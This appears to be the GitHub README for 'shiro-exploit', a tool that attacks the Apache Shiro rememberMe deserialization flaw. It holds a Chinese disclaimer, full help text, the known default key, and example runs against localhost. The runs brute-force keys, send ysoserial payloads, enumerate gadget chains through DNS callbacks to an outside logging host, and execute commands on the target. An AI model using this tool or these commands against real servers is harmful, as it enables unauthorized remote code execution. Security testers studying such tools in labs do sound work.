Skip to content

emo-crab/shiro-exploit

Repository files navigation

郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担。

使用方法

~ shiro-exploit --help
Usage: shiro-exploit [--key <key>] [-m <mode>] [-t <target>] [-s <ser>] [--file <file>] [--keys <keys>] [--csv <csv>] [--proxy <proxy>] [--timeout <timeout>] [--thread <thread>] [--chain] [--exploit] [--dns <dns>] [-p <payload>] [-c <command>] [--echo-name <echo-name>] [--command-name <command-name>] [-l]

shiro-exploit

Options:
  --key             you can specify known keys
  -m, --mode        apache-shiro encryption algorithm,default: CBC
  -t, --target      the target
  -s, --ser         serialize file
  --file            read the target from the file
  --keys            read the key from the file
  --csv             export to the csv file
  --proxy           proxy to use for requests
                    (ex:[http(s)|socks5(h)]://host:port)
  --timeout         set request timeout
  --thread          number of concurrent threads
  --chain           enum chain mode
  --exploit         exploit mode
  --dns             dns identifier, default: 981tzg.ceye.io
  -p, --payload     select a payload
  -c, --command     command to execute
  --echo-name       tomcat echo request header name
  --command-name    tomcat command request header name
  -l, --list        list all payload
  --help            display usage information

详细参数

  • --key指定Key,默认kPH+bIxk5D2deZiIxcaaaA==
  • -m指定加密模式,默认CBC,可选:GCM
  • -t单个目标
  • -s读入ysoserial生成的文件作为payload
  • --file从文件读入目标
  • --keys从文件读入key
  • --csv导出到csv文件
  • --exploit利用模式,爆破出key后,如果开启exploit模式会读入ysoserial生成的文件作为payload,如果--ser 参数为空,则为--dns作为URL_DNS的参数生成payload
  • --dns验证的DNS服务器,请求为目标的主机名_端口.你的DNS记录服务器,默认为981tzg.ceye.io
  • -p使用内置payload,配合-c或者--dns--echo-name--command-name,tomcat回显后面再更新
  • -l列出内置payload
  • --chain枚举利用链,结果查看DNS记录服务,前缀就是利用链名称。

使用ysoserial文件

~ shiro-exploit -t http://127.0.0.1:8080 --exploit --ser /home/kali-team/1.ser                 
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+
| url                                                                     | method | verify | mode | key                      |
+=========================================================================+========+========+======+==========================+
| http://127.0.0.1:8080/login;jsessionid=EAEAD8C3FA8884D816F575E55B654694 | GET    | true   | CBC  | kPH+bIxk5D2deZiIxcaaaA== |
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+

使用DNS记录验证漏洞

~ shiro-exploit -t http://127.0.0.1:8080 --exploit --dns 981tzg.ceye.io
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+
| url                                                                     | method | verify | mode | key                      |
+=========================================================================+========+========+======+==========================+
| http://127.0.0.1:8080/login;jsessionid=E01994D45911DE55FCE6606CFFF48AC7 | GET    | true   | CBC  | kPH+bIxk5D2deZiIxcaaaA== |
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+

爆破利用链

  • 主要利用ping命令带上利用链名称拼接到DNS前缀,如果能在DNS记录中看到说明可以使用该利用链
~ shiro-exploit -t http://127.0.0.1:8080 --exploit --dns 981tzg.ceye.io --chain
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+
| url                                                                     | method | verify | mode | key                      |
+=========================================================================+========+========+======+==========================+
| http://127.0.0.1:8080/login;jsessionid=E01994D45911DE55FCE6606CFFF48AC7 | GET    | true   | CBC  | kPH+bIxk5D2deZiIxcaaaA== |
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+
  • 查看DNS记录得到可用利用链,说明bs1,cck3,cc5,cc7,cck1cc6利用链可用
969227011	bs1.127.0.0.1.8080.981tzg.ceye.io	127.0.0.1	2022-12-22 13:48:20
969226980	bs1.127.0.0.1.8080.981tzg.ceye.io	127.0.0.1	2022-12-22 13:48:19
969226976	ccK3.127.0.0.1.8080.981tZG.cEYE.Io	127.0.0.1	2022-12-22 13:48:19
969226947	cc5.127.0.0.1.8080.981tzg.ceye.io	127.0.0.1	2022-12-22 13:48:18
969226945	cc7.127.0.0.1.8080.981tzg.ceye.io	127.0.0.1	2022-12-22 13:48:18
969226936	cCK3.127.0.0.1.8080.981tzg.ceyE.iO	127.0.0.1	2022-12-22 13:48:18
969226932	cck1.127.0.0.1.8080.981tzg.ceye.io	127.0.0.1	2022-12-22 13:48:18
969226818	cc6.127.0.0.1.8080.981tzg.ceye.io	127.0.0.1	2022-12-22 13:48:14

使用内置ysoserial

~ shiro-exploit -t http://127.0.0.1:8080 --exploit -p cck1 -c "ping qq.com"                                    
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+
| url                                                                     | method | verify | mode | key                      |
+=========================================================================+========+========+======+==========================+
| http://127.0.0.1:8080/login;jsessionid=5FAF1087D2448C017C2959B2AC02CDAF | GET    | true   | CBC  | kPH+bIxk5D2deZiIxcaaaA== |
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+